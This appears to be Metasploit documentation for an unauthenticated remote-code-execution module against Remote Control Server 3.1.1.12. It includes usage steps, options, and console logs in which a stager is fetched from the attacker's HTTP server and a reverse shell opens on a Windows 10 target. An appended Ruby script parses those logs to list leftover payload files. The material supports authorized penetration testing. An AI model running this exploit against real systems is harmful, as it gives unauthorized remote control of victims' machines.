metasploit-gs/documentation/modules/exploit/windows/misc/remote_control_collection_rce.md
2022-11-21 15:53:37 -05:00

Vulnerable Application

This module uses the protocol of the Remote Control Server, part of the Remote Control Collection by Steppschuh, to deploy a payload and run it from the server. The module will only deploy a payload if the server is set without a password (the default). Tested against 3.1.1.12, the current version at the time of module writing.

Version 3.1.1.12 can be downloaded from http://remote-control-collection.com/

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/windows/misc/remote_control_collection_rce
  4. Set rhost and lhost as required.
  5. Do: run
  6. You should get a shell as the user who is running Remote Mouse.

Options

PATH

The location to write the payload to. Defaults to %temp%\\ aka c:\\Windows\\Temp\\ on most systems.

SLEEP

The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen. Defaults to 1.

Scenarios

Remote Control Server 3.1.1.12 on Windows 10

resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (remote_mouse.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (remote_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_mouse_rce) > run

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] 1.1.1.1:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 1.1.1.1:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 1.1.1.1:1978 - Connecting
[*] 1.1.1.1:1978 - Sending Windows key
[*] 1.1.1.1:1978 - Opening command prompt
[*] 1.1.1.1:1978 - Sending stager
[*] 1.1.1.1:1978 - Using URL: http://2.2.2.2:8080/
[+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 1.1.1.1:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 1.1.1.1
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:49962) at 2022-09-27 16:33:02 -0400
[*] 1.1.1.1:1978 - Server stopped.
[!] 1.1.1.1:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Users\windows>whoami 
whoami
win10prolicense\windows

C:\Users\windows>systeminfo
systeminfo

Host Name:                 WIN10PROLICENSE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299

Remote Control Server 3.1.1.12 on Windows 10, with a password

Expected to fail.

resource (remote_control_collection.rb)> use exploits/windows/misc/remote_control_collection_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_control_collection.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (remote_control_collection.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (remote_control_collection.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_control_collection_rce) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Connecting and Sending Windows key
[*] Opening command prompt
[*] Sending stager
[*] Using URL: http://2.2.2.2:8080/
[*] Executing payload
[*] Server stopped.
[!] This exploit may require manual cleanup of 'c:\Windows\Temp\OqsTi76PX80it.exe' on the target
[*] Exploit completed, but no session was created
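
Both scenarios end with a manual-cleanup warning, and the second prints it even though no session was created. The Ruby below is an added example, not part of the module or of Metasploit: it parses saved console output in the format shown above and reports, per run, the target, whether a session opened, and the file paths named for cleanup. The function name `summarize_runs` and the sample log (with placeholder file names) are constructed for illustration.

```ruby
# Added example (not part of Metasploit): summarize saved console output from
# this module so leftover payload files can be tracked for cleanup.

# Constructed sample modeled on the two scenarios above; file names are placeholders.
SAMPLE_LOG = <<~'LOG'
  [*] Started reverse TCP handler on 2.2.2.2:4444
  [*] 1.1.1.1:1978 - Sending stager
  [*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:49962) at 2022-09-27 16:33:02 -0400
  [!] 1.1.1.1:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\EXAMPLEa.exe' on the target
  [*] Started reverse TCP handler on 2.2.2.2:4444
  [*] Sending stager
  [!] This exploit may require manual cleanup of 'c:\Windows\Temp\EXAMPLEb.exe' on the target
  [*] Exploit completed, but no session was created
LOG

RUN_START = /\A\[\*\] Started reverse TCP handler on /
PREFIX    = /\A\[[*+!]\] (?<target>\S+:\d+) - /
CLEANUP   = /manual cleanup of '(?<path>[^']+)' on the target/
SESSION   = /session \d+ opened/

# Returns one hash per run: { target:, session:, leftovers: [] }.
def summarize_runs(text)
  runs = []
  text.each_line do |raw|
    line = raw.strip
    if line.match?(RUN_START)
      runs << { target: nil, session: false, leftovers: [] }
      next
    end
    next if runs.empty? # skip console lines before the first run
    run = runs.last
    # The target prefix is absent in the second scenario, so it stays nil there.
    if (m = PREFIX.match(line))
      run[:target] ||= m[:target]
    end
    run[:session] = true if line.match?(SESSION)
    if (m = CLEANUP.match(line))
      run[:leftovers] << m[:path]
    end
  end
  runs
end

if __FILE__ == $PROGRAM_NAME
  summarize_runs(SAMPLE_LOG).each_with_index do |run, i|
    state = run[:session] ? 'session opened' : 'no session'
    puts "run #{i + 1}: target=#{run[:target] || 'unknown'} (#{state})"
    run[:leftovers].each { |path| puts "  check and remove: #{path}" }
  end
end
```

A run with no session still lists its path, so the file location can be checked on the host either way.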